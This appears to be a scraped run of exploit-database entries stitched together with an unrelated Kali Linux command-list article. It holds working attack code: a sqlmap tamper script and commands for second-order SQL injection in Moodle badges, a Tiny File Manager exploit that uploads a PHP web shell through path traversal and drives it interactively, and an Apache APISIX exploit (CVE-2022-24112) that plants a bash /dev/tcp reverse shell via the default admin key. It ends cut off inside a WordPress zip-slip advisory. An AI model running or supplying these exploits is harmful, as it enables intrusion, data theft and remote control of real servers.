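User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save

3. Create a file called `req2.txt` that looks like the following. Again, be sure to update the `Host:` field...

POST /moodle/badges/action.php HTTP/1.1
Host: <your-target-here>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me

4. Run the following sqlmap command, make sure the tamper argument is pointing at this file:

sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush

NOTES:
- for some reason after the first run sqlmap complains that it cannot fingerprint the db and will refuse
  to try enumerating anything else, this is why there is a flush at the end. I'm sure it can be fixed...
- you can do error based with this command (if errors are enabled...not likely):

sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --level=5 --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user --fresh-queries --flush --test-filter='MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'

How it works (briefly):
- In order to get our sql query into the database it's necessary to create a badge and add some criteria.
  It is when adding the criteria that the sql-to-be-executed-2nd-order is inserted into the database.
  Finally, when the badge is enabled the injected sql is executed.
- This tamper script does the following:
    - log in to the app
    - update cookie/sesskey for both the 1st and 2nd requests
    - make all the requests necessary to create the badge, right up until adding the criteria
    - sqlmap itself adds the criteria with whatever payload it's testing
    - sqlmap makes the 2nd call to enable the badge (runs the injected sql)
    - next time around the tamper script will delete the badge that it last created to prevent
      having 10000s of badges for the course

Analysis of the bug:
- see http://muffsec.com/blog/moodle-2nd-order-sqli/

Why?:
1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?)
2. It's an interesting use of sqlmap. There are some articles talking about using it for 2nd order sqli
   but the use cases outlined are relatively straightforward. There's a few hacky things being done with
   sqlmap in this script which others might want to do some day i.e.
    - using the tamper script to authenticate to the app
    - updating the Cookie in sqlmap's httpHeader structure
    - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request
3. I wanted to practice programming/thought it would be fun. Also I didn't want to reinvent the wheel
   with a standalone exploit when sqlmap is just so darn good at what it does.

Thoughts:
- The exploit is not optimized, halfway through writing I realized there is a badge duplication feature
  which would cut the number of requests generated down significantly. There's probably many other ways
  it could be improved as well
- I didn't do much testing...it works on my system...
- I would be surprised if anyone ever put a `Teacher` level sqli to practical use
- As a bonus, this bug is also usable as a stored xss
- Would be cool if moodle's bug bounty paid more than kudos
"""

# ---- target configuration (edit these) -------------------------------------
USERNAME = "teacher"
PASSWORD = "password"
APP_ROOT = "http://127.0.0.1/moodle"
COURSE_ID = 3

# Where the id of the last badge we created is persisted between sqlmap runs so
# that a badge left behind by an interrupted run can be deleted on the next one.
# NOTE(review): fixed, world-readable path under /tmp - acceptable on a
# single-user attack box, not in a shared environment.
LAST_BADGE_ID_FILE = "/tmp/last-known-badge-id"

USER_AGENT = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
              '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36')

# a badge cannot be created without an image; this one is fetched by Moodle itself
BADGE_IMAGE_URL = ('https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/'
                   'Moodle-logo.svg/512px-Moodle-logo.svg.png')

# sent as repeated `accepted_types[]` form fields (a dict literal with the key
# repeated five times only keeps the last value, which is what the original did)
ACCEPTED_TYPES = ['.gif', '.jpe', '.jpeg', '.jpg', '.png']


def _first_match(pattern, text):
    """Return the first capture group of `pattern` found in `text`, or None."""
    found = re.findall(pattern, text)
    return found[0] if found else None


def get_user_session(username, password, app_root):
    """
    Log in to Moodle and return (session, cookie_dict, sesskey).

    - GET the login page to obtain the logintoken (and the initial session cookie)
    - POST the credentials; Moodle answers a successful login with a redirect
    - follow that redirect once (the "session test") which activates the session
      and exposes the sesskey (Moodle's CSRF token) in the page

    Exits the process on any failure: nothing else in this script can work
    without an authenticated session.
    """
    s = requests.Session()
    login_page = "{app_root}/login/index.php".format(app_root=app_root)

    r = s.get(login_page, verify=False)
    token = _first_match('logintoken" value="(.*?)"', r.text)
    if token is None:
        sys.exit("[-] did not find logintoken, is the target correct?")

    payload = {'username': username, 'password': password, 'anchor': '', 'logintoken': token}
    r = s.post(login_page, data=payload, allow_redirects=False, verify=False)
    cookie = r.cookies.get_dict()

    # Without a fresh cookie and a redirect to follow there is no session to
    # use; check before touching r.headers['Location'] to avoid a KeyError.
    if len(cookie) == 0 or 'Location' not in r.headers:
        sys.exit("[-] Could not establish session! Are credz correct?")

    r = s.get(r.headers['Location'], verify=False)
    sesskey = _first_match('sesskey":"(.*?)"', r.text)
    if sesskey is None:
        sys.exit("[-] logged in but no sesskey found in the post-login page")

    print("[+] Cookie: {} for user \"{}\"".format(cookie, username))
    print("[+] sesskey: {} for user \"{}\"".format(sesskey, username))
    return s, cookie, sesskey


def new_badge1(s, sesskey, app_root, course_id):
    """
    First request generated when "add a new badge" is clicked.

    Returns the tuple (client_id, itemid, ctx_id) needed by the image requests,
    or -1 when any of them is missing from the response.
    """
    target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root)
    # badge type 2 is a course badge (rather than a site badge)
    payload = {'type': 2, 'id': course_id, 'sesskey': sesskey}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)

    wanted = (('client_id', '"client_id":"(.*?)"'),
              ('itemid', '"itemid":(.*?),"'),
              ('ctx_id', '&ctx_id=(.*?)&'))
    values = []
    for name, pattern in wanted:
        value = _first_match(pattern, r.text)
        if value is None:
            print("[-] failed to grab {} in new_badge1()".format(name))
            return -1
        values.append(value)
    return tuple(values)


def _filepicker_fields(sesskey, client_id, itemid, ctx_id):
    """Form fields shared by both repository_ajax.php calls of the image flow."""
    return {'repo_id': '6',  # repo id 6 is the repository used to download the image from a URL
            'p': '',
            'page': '',
            'env': 'filepicker',
            'accepted_types[]': ACCEPTED_TYPES,
            'sesskey': sesskey,
            'client_id': client_id,
            'itemid': itemid,
            'maxbytes': '262144',
            'areamaxbytes': '-1',
            'ctx_id': ctx_id}


def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id):
    """
    Start the "download image from URL" flow of the filepicker.

    Returns the sourcekey on success, -1 on failure.
    """
    target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root)
    payload = _filepicker_fields(sesskey, client_id, itemid, ctx_id)
    payload['file'] = BADGE_IMAGE_URL
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)

    sourcekey = _first_match('"sourcekey":"(.*?)","', r.text)
    if sourcekey is None:
        print("[-] failed to grab sourcekey in image_signin()")
        return -1
    return sourcekey


def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey):
    """
    Finish the image flow started in image_signin(): Moodle downloads the image.

    Returns the image id on success, -1 on failure.
    """
    target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root)
    payload = _filepicker_fields(sesskey, client_id, itemid, ctx_id)
    payload.update({'title': '512px-Moodle-logo.svg.png',
                    'source': BADGE_IMAGE_URL,
                    'savepath': '/',
                    'sourcekey': sourcekey,
                    'license': 'unknown',
                    'author': 'moodle-hax'})
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)

    image_id = _first_match(',"id":(.*?),"file', r.text)
    if image_id is None:
        print("[-] failed to grab image_id in image_download()")
        return -1
    return image_id


def new_badge2(s, sesskey, app_root, course_id, image_id,
               name="sqlmap-badge", description="sqlmap-description"):
    """
    Actually create the badge (type 2 = course badge).

    Returns the new badge id, or -1 if the response does not link to its
    criteria page (typically because a badge with the same name exists).
    """
    target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root)
    payload = {'type': '2',
               'id': course_id,
               'action': 'new',
               'sesskey': sesskey,
               '_qf__core_badges_form_badge': '1',
               'mform_isexpanded_id_badgedetails': '1',
               'mform_isexpanded_id_issuancedetails': '1',
               'name': name,
               'version': '',
               'language': 'en',
               'description': description,
               'image': image_id,
               'imageauthorname': '',
               'imageauthoremail': '',
               'imageauthorurl': '',
               'imagecaption': '',
               'expiry': '0',
               'submitbutton': 'Create+badge'}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)

    badge_id = _first_match(r'badges/criteria.php\?id=(.*?)"', r.text)
    if badge_id is None:
        return -1
    return badge_id


def delete_badge(s, sesskey, app_root, course_id, badge_id):
    """Delete the course badge `badge_id` (confirm=1 skips the confirmation page)."""
    target_url = "{app_root}/badges/index.php".format(app_root=app_root)
    payload = {'sort': 'name',
               'dir': 'ASC',
               'page': '0',
               'type': '2',
               'id': course_id,
               'delete': badge_id,
               'confirm': '1',
               'sesskey': sesskey}
    # TODO: add validation logic (the response is not inspected)
    s.post(target_url, data=payload, allow_redirects=False, verify=False)


def _read_last_badge_id():
    """Return the badge id persisted by a previous run, or None if there is none."""
    try:
        with open(LAST_BADGE_ID_FILE, "r") as f:
            value = f.read().strip()
    except (IOError, OSError):
        return None
    return value or None


def _write_last_badge_id(badge_id):
    """Persist the id of the badge just created (see LAST_BADGE_ID_FILE)."""
    with open(LAST_BADGE_ID_FILE, "w") as f:
        f.write(str(badge_id))


def tamper(payload, **kwargs):
    """
    sqlmap tamper hook: set up a fresh badge for every payload sqlmap sends.

    The payload is returned untouched; the work is in the side effects:
    - on the first call, log in and push the session cookie into sqlmap's headers
    - delete the badge created by the previous call
    - run the badge creation flow (image + metadata) and remember the new id
    - rewrite sesskey and badge id in both the primary request and the
      --second-req request sqlmap is about to send
    """
    # --- first call: authenticate and teach sqlmap about the session ----------
    # The request file must NOT carry its own Cookie header: its presence is
    # what tells us the session is already set up.
    if 'Cookie' not in [name for name, _ in conf.httpHeaders]:
        s, cookie, sesskey = get_user_session(USERNAME, PASSWORD, APP_ROOT)
        conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession'])))
        # our own state, stashed on sqlmap's global conf object
        conf.sesskey = sesskey
        conf.s = s

    # --- remove the badge from the previous round -----------------------------
    previous = getattr(conf, 'badge_id', None)
    if previous is not None:
        delete_badge(conf.s, conf.sesskey, APP_ROOT, COURSE_ID, previous)

    # --- badge creation flow, right up to (not including) the criteria --------
    ids = new_badge1(conf.s, conf.sesskey, APP_ROOT, COURSE_ID)
    if ids == -1:
        sys.exit("[-] could not start the new badge flow")
    client_id, itemid, ctx_id = ids

    sourcekey = image_signin(conf.s, conf.sesskey, APP_ROOT, client_id, itemid, ctx_id)
    if sourcekey == -1:
        sys.exit("[-] image signin failed")
    image_id = image_download(conf.s, conf.sesskey, APP_ROOT, client_id, itemid, ctx_id, sourcekey)
    if image_id == -1:
        sys.exit("[-] image download failed")

    conf.badge_id = new_badge2(conf.s, conf.sesskey, APP_ROOT, COURSE_ID, image_id)
    if conf.badge_id == -1:
        # Most likely a badge with the same name already exists, e.g. one left
        # behind after a control+c with broken criteria (such a badge only shows
        # an error on the badge management page and cannot be deleted through
        # moodle). Delete the id persisted last time and retry once.
        stale = _read_last_badge_id()
        if stale is not None:
            delete_badge(conf.s, conf.sesskey, APP_ROOT, COURSE_ID, stale)
            conf.badge_id = new_badge2(conf.s, conf.sesskey, APP_ROOT, COURSE_ID, image_id)
        if conf.badge_id == -1:
            sys.exit("[-] badge creation failed twice; delete the stale badge by hand")
    _write_last_badge_id(conf.badge_id)

    # --- rewrite sesskey and badge id in the 1st request ----------------------
    # both conf.parameters and conf.paramDict have to be updated; `*` after
    # field_lastname is sqlmap's custom injection marker (paramDict key '#1*').
    post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&"
            "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&"
            "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&"
            "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&"
            "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save"
            .format(sesskey=conf.sesskey))
    get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id)
    # Host/Referer/User-Agent are read back from what sqlmap parsed; at the
    # documented --level=5 sqlmap populates them even if req.txt has no Referer
    # (presumably - verify if a KeyError shows up here).
    conf.parameters = {'(custom) POST': post,
                       'GET': get,
                       'Host': conf.parameters['Host'],
                       'Referer': conf.parameters['Referer'],
                       'User-Agent': conf.parameters['User-Agent']}
    conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]),
                      'GET': OrderedDict([('badgeid', conf.badge_id), ('add', '1'), ('type', '6')]),
                      'Host': {'Host': conf.parameters['Host']},
                      'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=APP_ROOT)},
                      'User-Agent': {'User-Agent': USER_AGENT}}

    # --- and in the 2nd request (badge activation, which runs the injected sql)
    secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&"
                     "confirm=1&return=/badges/criteria.php?id={badge_id}"
                     .format(badge_id=conf.badge_id, sesskey=conf.sesskey))
    kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=APP_ROOT),
                       'POST',
                       secondReq_url,
                       None,
                       (('Host', APP_ROOT.split('/')[2]),
                        ('Content-Type', 'application/x-www-form-urlencoded'),
                        ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])),
                        ('User-Agent', USER_AGENT)))

    return payload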
Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
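#!/bin/bash
# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
# Date: 14/03/2022
# Exploit Author: FEBIN MON SAJI
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <= 2.4.6
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-40964
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
#
# Flow: log in with admin credentials -> leak the web root through the
# upload-from-URL response (full path disclosure) -> upload a PHP web shell
# with a path traversal in the `fullpath` upload field -> talk to the shell.

# need <binary> <display-name>: abort with a non-zero status if a tool is missing
need(){
  if command -v "$1" >/dev/null 2>&1; then
    printf "[✔] %s found! \n" "$2"
  else
    printf "[❌] %s not found! \n" "$2"
    exit 1
  fi
}

check(){
  need curl Curl
  need jq jq
}

usage(){
  printf " Tiny File Manager Authenticated RCE Exploit. By FEBIN
%s <URL> <Admin Username> <Password>
Example: %s http://files.ubuntu.local/index.php admin \"admin@123\"
" "$0" "$0"
}

# log-in <url> <user> <password>: sets the globals URL and cookie.
# Credentials are URL-encoded so characters such as & or + survive the POST.
log-in(){
  URL=$1
  admin=$2
  pass=$3
  cookie=$(curl "$URL" -X POST -s -i \
             --data-urlencode "fm_usr=$admin" --data-urlencode "fm_pwd=$pass" \
           | grep -i "^Set-Cookie: " | sed 's/^[Ss]et-[Cc]ookie: //' | tr -d " " | tr ";" "\n" | head -1)
  # NOTE(review): a Set-Cookie header alone does not prove the credentials were
  # accepted (a session cookie may be issued before the password check); a
  # failed upload later on is the practical sign of bad credentials.
  if [ -n "$cookie" ]; then
    printf "\n[+] Login Success! Cookie: %s \n" "$cookie"
  else
    printf "\n[-] Login Failed! \n"
    exit 1
  fi
}

# Leak the web root: asking the app to upload from an unresolvable URL makes it
# return the full local path it tried to write to ("file": "/var/www/...").
find_webroot(){
  printf "\n[*] Try to Leak Web root directory path \n\n"
  # the original matched any line containing "file"; this picks the first key
  # literally named "file" at any depth of the JSON answer
  leaked=$(curl -X POST "$URL?p=&upload" -s -H "Cookie: $cookie" \
             -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" \
           | jq -r '.. | .file? // empty' 2>/dev/null | head -1)
  if [ -n "$leaked" ]; then
    webroot=${leaked%/*}   # drop the last path component (the file name)
    printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : %s \n\n" "$webroot"
  else
    printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
    webroot="/var/www/html"
  fi
}

# Write a minimal PHP shell locally and upload it; the traversal in `fullpath`
# makes the application store it under the web root instead of the upload dir.
# Returns the exit status of grep, i.e. 0 only if the app reported success.
upload(){
  shell="shell$RANDOM.php"
  echo "<?php system(\$_REQUEST['cmd']); ?>" > "/tmp/$shell"
  curl "$URL?p=" -X POST -s \
       -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" \
       -b "$cookie" -F "p=" \
       -F "fullpath=../../../../../../../..${webroot}/${shell}" \
       -F "file=@/tmp/$shell" \
  | grep "successful"
  status=$?
  rm -f "/tmp/$shell"
  return $status
}

exploit(){
  WEB_URL=${URL%/*}   # strip the script name (index.php) from the URL
  if upload; then
    printf "[+] File Upload Successful! \n"
  else
    printf "[-] File Upload Unsuccessful! Exiting! \n"
    exit 1
  fi

  printf "[+] Checking for the shell \n"
  if curl "${WEB_URL}/${shell}?cmd=echo%20found" -s | head -1 | grep -q "found"; then
    printf "[+] Shell found %s/%s \n" "${WEB_URL}" "$shell"
  else
    printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
    exit 2
  fi

  printf "[+] Getting shell access! \n\n"
  while true; do
    printf '$> '
    read -r cmd || break   # EOF (ctrl-d) ends the session
    # --data-urlencode so commands containing & or + reach the shell intact
    curl "${WEB_URL}/$shell" -s -X POST --data-urlencode "cmd=${cmd}"
  done
}

if [ -n "$1" ] && [ -n "$2" ] && [ -n "$3" ]; then
  check
  log-in "$1" "$2" "$3"
  find_webroot
  exploit
else
  usage
fi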
Title: Kali Linux command collection
There are thousands of Kali Linux commands. Kali Linux is a similar operating system to other Linux-based operating systems, so the basic Linux commands are the same as on those systems. The biggest problem for new users learning these commands is that they cannot remember them clearly or systematically. This article lists the commonly used commands from A~Z. It is convenient for friends to learn. This article is long, so bookmark it and come back to it! WeChat public account kali hacker notes System Commands in Kali Linux Arch command You can use the arch command to find out the computer architecture. Arch prints values such as "i386, i486, i586, alpha, arm, m68k, mips, sparc, x86_64, etc.". Arp command ARP stands for the Address Resolution Protocol, which is used to find the hardware address of a network neighbor for a given IPv4 address. The arp command is used to display the ARP table of your Kali Linux system. You can use this command on other Linux systems as well as on Windows operating systems. The ARP table is also what you inspect when ARP spoofing is suspected (a poisoned entry shows a neighbor's IP mapped to the attacker's MAC address). arping command The arping command is similar to the ping command, but it works on the Ethernet layer. The arping command gives the reachability and round-trip time of an IP address in the local network. arping -i eth0 192.168.123.1 Aspell Command Aspell is a spell checker command in Kali Linux, where you can provide file names or anything from standard input to check for spelling errors. Syntax: aspell check [options] file name aspell -c bbskali.txt awk command The awk command is used to manipulate data and generate reports in a scripting language. It allows users to use variables, numeric and string functions, and logical operators, so you can use awk to build small utilities.
AWK operations: (a) Scan the file line by line (b) Split each input line into fields (c) Compare input lines/fields with patterns (d) Perform actions on matching lines Programming structure: (a) Format output lines (b) Arithmetic and string operations (c) Conditionals and loops Syntax: awk option 'selection_criteria {action}' input-file > output-file #Show used memory (third column of the "Mem:" line) echo `free | grep -w 'Mem' | awk '{print $3}'` The bg command bg command is used to control shell jobs. It resumes a stopped or suspended job in the background. Bzip2 Bzip2 is a basic utility for compressing and decompressing files Compress a file: bzip2 -z bbskali.txt Decompress a file: bzip2 -d 22.txt.bz2 cal command cal command is used to display the calendar The cat command cat command is used to view and edit the content in a file. cat > 'New File' #Create a new file or overwrite the data in the given file (type the content, then Ctrl+D) cat "File Name" #View contents of the file cat >> "File Name" #Append data to the file cksum command The cksum command stands for checksum, which is used to calculate the CRC (cyclic redundancy check) and number of bytes for each input file and write it to standard output. Clear command The Clear command is used to clear the terminal screen when the terminal screen becomes full after multiple commands are run in the terminal. Shortcut key: Ctrl+L The cmp command cmp command is used to compare two files byte by byte. If a difference is found, it reports the byte and line number where the first difference was found. If no difference is found, by default, cmp returns no output. The basic syntax of cmp command cmp file1.txt file2.txt comm command You can use the comm command to compare two sorted files line by line. Basic syntax for using this command: comm file1.txt file2.txt cp command The cp command is used to copy one or more files from one location to another.
To copy the 22.txt file into /root: cp 22.txt /root crontab command Scheduled-task command, very powerful. For details, please read the article about it that I wrote earlier on the blog. crontab -e #Edit crontab crontab -l #List the crontab jobs. crontab -r #Remove your whole crontab (all jobs, without confirmation). The cut command cut command is used to cut a portion of each line from the specified file or pipeline data and print the result. Display the 1st and 3rd fields (tab-separated by default) of each line of the file cut -f 1,3 22.txt date command date displays the current date The df command df command stands for Disk Free to report file system disk space usage. diff command The diff command is used to display the differences between two files. diff3 command The diff3 command is used to display the differences between three files. dig command Queries DNS servers and displays the records for a domain name. dir command The dir command is used to print a list of contents of a directory. Most Linux users use the ls command instead of the dir command. echo command The echo command is one of the most basic commands in Linux and is used to display messages on the screen. The parameters passed to echo are printed to standard output. echo is usually used in shell scripts to display messages or output results of other commands. echo hello bbskali.cn egrep command The egrep command is used to search for lines matching text patterns in a file. For example, to find out whether zi.txt contains bbskali.cn (several patterns can be searched at once by joining them with |): egrep 'bbskali.cn' zi.txt ethtool command If you want to use ethtool to display network usage statistics, please use the following command ethtool -S eth0 whoami command Display the user name of the current login File-related commands pwd command Used to print the working directory. It means "where are you?" The ls command The ls command is used to list the files and directories in a directory. cd command Switch directory command The mkdir command mkdir command is used to create directories.
If you want to create a directory in the current directory, just use mkdir directory-name. mv command The mv command moves files and folders, the equivalent of cut and paste in Windows mv file/folder-name target-location {target-location = where you want to move it to} The mv command is also used to rename files and folders mv old-file-name new-file-name The rm command: rm command is used to delete files and, with -r, folders. Deleted files do not go to a recycle bin, so use it carefully. Kali Linux-based commands uname command "uname" stands for (Unix Name), displaying detailed information about the machine name, operating system, and kernel. uptime Used to check how long your system has been running. System uptime is also useful in forensic evidence collection, because it tells you when the machine was last booted. uptime 14:30:34 up 4:52, 1 user, load average: 0.00, 0.03, 0.00 sort command The lines of a text file can be sorted in ascending order. Use the -r option to sort in descending order. $sort filename.txt #Ascending order $sort -r File name.txt #Descending order free command Display current memory information free -m history command history command is used to view the most recently run commands Advanced Kali Linux System Commands The find command is used to search for files in Linux Find is a command line utility that allows you to search for files and directories in a directory hierarchy based on user-designated expressions and apply user-specified actions to each matching file. For example: find all 22.txt files find -name 22.txt apt-get command apt-get is a package manager for installing, deleting, cleaning, and updating packages. The dpkg command dpkg command is used to install deb files in Kali Linux. You can also use the dpkg command to delete the package. Kali Linux is a Debian-based operating system, so you can install .deb files. Format: dpkg -i package name The du command du command is used to display the amount of disk space used by files and directories. adduser command adduser Add user, that is, add users in Linux.
passwd command passwd changes a user's password. To change the root password: passwd root usermod command The usermod command is used to modify a user account, for example its group membership. lsb_release command The lsb_release command is used to check the version of Kali Linux. lsb_release -a SCP Command The scp command is used to securely copy files from one device to another. There are several ways to transfer files from one system to another, but scp copies files over the SSH protocol, so the remote system must have an SSH server running. scp [options] [user@]SRC_HOST:file1_path [user@]DEST_HOST:file2 unzip command Extracts a .zip archive, the equivalent of right-click > Extract in Windows unzip bbskali.zip Postscript Of course, there are many more fun commands in Kali, so I won't talk about them here. For more tutorials, please follow our WeChat official account Kali Hacker Notes.
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
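# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112
"""
CVE-2022-24112 PoC.

A single POST to /apisix/batch-requests carries a pipelined PUT against the
Admin API (/apisix/admin/routes/index) with the X-Real-IP header forced to
127.0.0.1, so the sub-request appears to originate from localhost. The route
it creates has a `filter_func` (Lua executed by APISIX for each request to the
route) that spawns a reverse shell; a GET on the route triggers it.

The Admin API key is still required: the script uses the key APISIX ships by
default, so it only works against targets that never changed it.
"""
import json
import sys

import requests


class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'


color_random = [color.HEADER, color.IMPORTANT, color.NOTICE, color.OKBLUE, color.OKGREEN,
                color.WARNING, color.RED, color.END, color.UNDERLINE, color.LOGGING]

# The admin key present in APISIX's default config.yaml.
DEFAULT_ADMIN_KEY = 'edd1c9f034335f136f87ad84b625c8f1'

USER_AGENT = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
              '(KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69')

# Path of the route the payload creates; requesting it fires the filter_func.
TRIGGER_URI = '/rms/fzxewh'


def banner():
    run = color_random[6] + '''\n . , _.._ * __*\\./ ___ _ \\./._ | _ *-+- (_][_)|_) |/'\\ (/,/'\\[_)|(_)| | | | \n'''
    run2 = color_random[2] + '''\t\t(CVE-2022-24112)\n'''
    run3 = color_random[4] + '''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
    print(run + run2 + run3)


def build_route_body(lhost, lport, uri=TRIGGER_URI):
    """Return the JSON body of the Admin API PUT that creates the malicious route.

    `filter_func` is Lua source run by APISIX on every request to `uri`: it
    executes a bash reverse shell to lhost:lport over /dev/tcp and returns
    true so the request is otherwise handled normally.
    """
    reverse_shell = ('0<&160-;exec 160<>/dev/tcp/{lhost}/{lport};'
                     'sh <&160 >&160 2>&160'.format(lhost=lhost, lport=lport))
    # The \" inside the Lua single-quoted string becomes \\\" after json.dumps
    # and reaches Lua as \" again, i.e. the target runs: bash -c "..."
    filter_func = ("function(vars) os.execute('bash -c \\\"" + reverse_shell +
                   "\\\"'); return true end")
    route = {
        'uri': uri,
        'upstream': {'type': 'roundrobin', 'nodes': {'schmidt-schaefer.com': 1}},
        'name': 'wthtzv',
        'filter_func': filter_func,
    }
    # compact separators reproduce the exact body the original script sent
    return json.dumps(route, separators=(',', ':'))


def build_batch_request(lhost, lport, admin_key=DEFAULT_ADMIN_KEY):
    """Return the /apisix/batch-requests document with one pipelined Admin API PUT.

    X-Real-IP is set to 127.0.0.1 so the forwarded sub-request looks local to
    the Admin API - that is the core of CVE-2022-24112.
    """
    return {
        'headers': {
            'X-Real-IP': '127.0.0.1',
            'X-API-KEY': admin_key,
            'Content-Type': 'application/json',
        },
        'timeout': 1500,
        'pipeline': [
            {
                'path': '/apisix/admin/routes/index',
                'method': 'PUT',
                'body': build_route_body(lhost, lport),
            },
        ],
    }


def exploit(target_url, lhost, lport, admin_key=DEFAULT_ADMIN_KEY):
    """Create the route via batch-requests, then request it to fire the shell.

    `target_url` may be given with or without a trailing slash (the original
    silently produced a broken URL without one). Returns both responses so the
    caller can inspect status codes. Content-Length is computed by requests;
    the hard-coded value of the original (540) never matched the real body.
    """
    base = target_url.rstrip('/')
    headers = {
        'Host': '127.0.0.1:8080',
        'User-Agent': USER_AGENT,
        'X-API-KEY': admin_key,
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/json',
        'Connection': 'close',
    }
    # verify=False: targets are typically self-signed; nothing here is secret.
    response1 = requests.post(base + '/apisix/batch-requests', headers=headers,
                              json=build_batch_request(lhost, lport, admin_key), verify=False)
    print('[*] batch-requests answered HTTP {}'.format(response1.status_code))
    response2 = requests.get(base + TRIGGER_URI, headers=headers, verify=False)
    print('[*] trigger route answered HTTP {} - check your listener'.format(response2.status_code))
    return response1, response2


def main(argv):
    """CLI entry point: <target_url> <lhost> <lport>; returns the process exit status."""
    banner()
    if len(argv) != 4:
        print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>")
        return 1
    exploit(argv[1], argv[2], argv[3])
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))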
Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
# Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated) # Date: 02-17-2022 # Exploit Author: Ceylan Bozoğullarından # Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/ # Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/ # Version: 1.2.12 # Tested on: Linux # CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776) # Description: iQ Block Country is a Wordpress plugin that allows you to limit access to your website content. It can allow or disallow visitors from defined countries to (parts of) the content of the website. The settings of the plugin can be exported or imported using its backup functionality. An authorized user can import preconfigured settings of the plugin by uploading a zip file. After the uploading process, files in the uploaded zip file are extracted one by one. During the extraction process, existence of a file is checked. If the file exists, it is deleted without any security control by only considering the name of the extracted file. This behavior leads to “Zip Slip” vulnerability. Zip Slip can 